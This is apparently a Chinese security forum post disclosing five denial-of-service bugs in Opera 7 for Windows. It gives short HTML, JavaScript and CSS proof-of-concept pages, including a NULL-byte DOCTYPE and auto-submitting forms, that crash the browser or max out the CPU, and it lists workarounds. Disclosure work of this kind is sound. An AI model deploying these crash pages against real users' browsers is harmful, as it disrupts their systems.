|
|
论坛登陆名: joker
提交者邮件地址: palmjoker@2911.net
提交者QQ号码:
标题: Opera 7 五个Dos漏洞
版权:文章属中华安全网http://www.safechina.net和作者共同所有,转载请注明出处!!
内容:
-= Fastest browser on earth, Fastest crash on earth too =-
PRODUCT : Opera for Windows
VERSIONS : 7.11b build 2887
7.11 build 2880
7.10 build 2840
7.03 build 2670
Opera 7存在许多Bugs,下面是五个新发现的可使CPU占用100%的漏洞:
[ CODE 1 ]
只需12字节数据"<!DOCTYPE" + NULL(\x00) + 1byte + ">" 就可使CPU占用100%
然后当机。
-----------------------------------------------------------------
<!DOCTYPE[\x00]A>
-----------------------------------------------------------------
[ CODE 2 ]
当机或非法操作
-----------------------------------------------------------------
<form></form><script>document.forms[0].submit()</script>
-----------------------------------------------------------------
[ CODE 3 ]
当机或非法操作
-----------------------------------------------------------------
<table>
<tr id="crash" style="display:inline"><td>
<script>crash.style.display = "none";</script>
</td></tr>
</table>
-----------------------------------------------------------------
[ CODE 4 ]
当机或非法操作
-----------------------------------------------------------------
<table>
<map id="crash" style="position:absolute"></map>
<script>crash.style.height = crash.style.width = '0';</script>
</table>
-----------------------------------------------------------------
[ CODE 5 ]
CPU占用100%,然后当机
-----------------------------------------------------------------
<html>
<head>
<style type="text/css">
<!--
.aaaaa:after{content:"A";display:block}
.bbbbb{display:run-in}
.ccccc{display:inline-block}
//-->
</style>
</head>
<body>
<div class="aaaaa">
<div class="bbbbb">
<div class="ccccc">
</div>
</div>
</div>
</body>
</html>
解决办法:
[ CODE 1 ] 尚无
[ CODE 2 ] 关闭 "JavaScript"
[ CODE 3 ] 关闭 "JavaScript"
[ CODE 4 ] 关闭 "JavaScript"
[ CODE 5 ] 关闭 "CSS Author mode"
|
|
